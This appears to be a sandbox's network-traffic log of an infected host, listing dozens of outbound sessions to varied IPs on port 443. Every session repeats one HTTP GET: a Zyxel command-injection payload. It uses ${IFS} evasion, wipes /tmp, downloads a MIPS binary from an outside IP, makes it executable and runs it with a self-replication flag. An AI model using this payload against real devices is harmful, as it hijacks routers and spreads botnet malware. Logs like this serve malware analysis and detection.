                                                Jan 12, 2024 18:24:45.083523989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6742192.168.2.1343932105.172.93.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.083564997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6743192.168.2.1346086107.238.61.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.083647013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6744192.168.2.133351267.109.220.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.083722115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6745192.168.2.13449502.91.167.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.083779097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6746192.168.2.1334644102.231.184.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.083842993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6747192.168.2.133461695.104.24.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.083918095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6748192.168.2.1350376206.49.236.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.083946943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6749192.168.2.135999674.190.52.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.084024906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6750192.168.2.1353160154.232.15.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.084083080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6751192.168.2.1333132218.71.82.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.084158897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6752192.168.2.135956877.130.229.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.084212065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6753192.168.2.1353358204.155.117.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.084249020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6754192.168.2.1340698148.207.47.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.084322929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6755192.168.2.135784683.176.212.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.084393978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6756192.168.2.1337056124.206.168.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.084444046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6757192.168.2.133629463.30.195.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.084496975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6758192.168.2.1343426208.14.51.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.084542990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6759192.168.2.1349420220.58.51.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.084573030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6760192.168.2.1348212194.19.207.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.084620953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6761192.168.2.135728419.154.139.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.084673882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6762192.168.2.135919231.177.78.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.084733009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6763192.168.2.1359070115.65.227.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.084789038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6764192.168.2.1344896195.19.27.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.084860086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6765192.168.2.1350422165.178.13.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.084912062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6766192.168.2.1340998177.110.21.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.084990025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6767192.168.2.1344794124.132.115.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.085047960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6768192.168.2.1353254156.240.34.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.085103035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6769192.168.2.1355486194.171.29.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.085181952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6770192.168.2.1339718132.172.38.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.085241079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6771192.168.2.1346038111.92.163.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.085266113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6772192.168.2.135918477.209.28.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.085324049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6773192.168.2.1341912190.33.239.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.085364103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6774192.168.2.134096883.63.144.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.085429907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6775192.168.2.1343648185.37.122.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.085462093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6776192.168.2.135894650.251.74.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.085517883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6777192.168.2.1344622146.24.116.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.085562944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6778192.168.2.135086089.136.75.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.085649967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6779192.168.2.1348006155.165.242.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.085710049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6780192.168.2.134346852.191.181.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.085767031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6781192.168.2.1346248221.169.20.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.085814953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6782192.168.2.135455840.134.102.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.085884094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6783192.168.2.135743247.190.22.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.085946083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6784192.168.2.133395645.216.95.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.086030006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6785192.168.2.135811654.144.168.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.086066008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6786192.168.2.1350386163.74.239.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.086118937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6787192.168.2.134345831.130.245.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.086173058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6788192.168.2.133700023.178.79.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.086314917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6789192.168.2.136074237.141.250.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.086369991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6790192.168.2.134056423.19.2.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.086407900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6791192.168.2.1351500162.161.50.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.086467028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6792192.168.2.1338922173.229.160.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.086508989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6793192.168.2.135278454.58.249.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.086568117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6794192.168.2.135488262.140.89.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.086644888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6795192.168.2.1352004115.45.204.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.086692095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6796192.168.2.1351872166.29.57.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.086767912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6797192.168.2.1357342158.119.111.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.086805105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6798192.168.2.1337046185.220.37.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.086858034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6799192.168.2.134038487.120.108.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.086919069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6800192.168.2.134277859.30.209.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.086970091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6801192.168.2.1336338153.113.4.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.087028027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6802192.168.2.1349444108.83.191.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.087080956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6803192.168.2.1350230190.112.150.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.087162018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6804192.168.2.1352672121.183.45.113443
                                                TimestampBytes transferredDirectionData
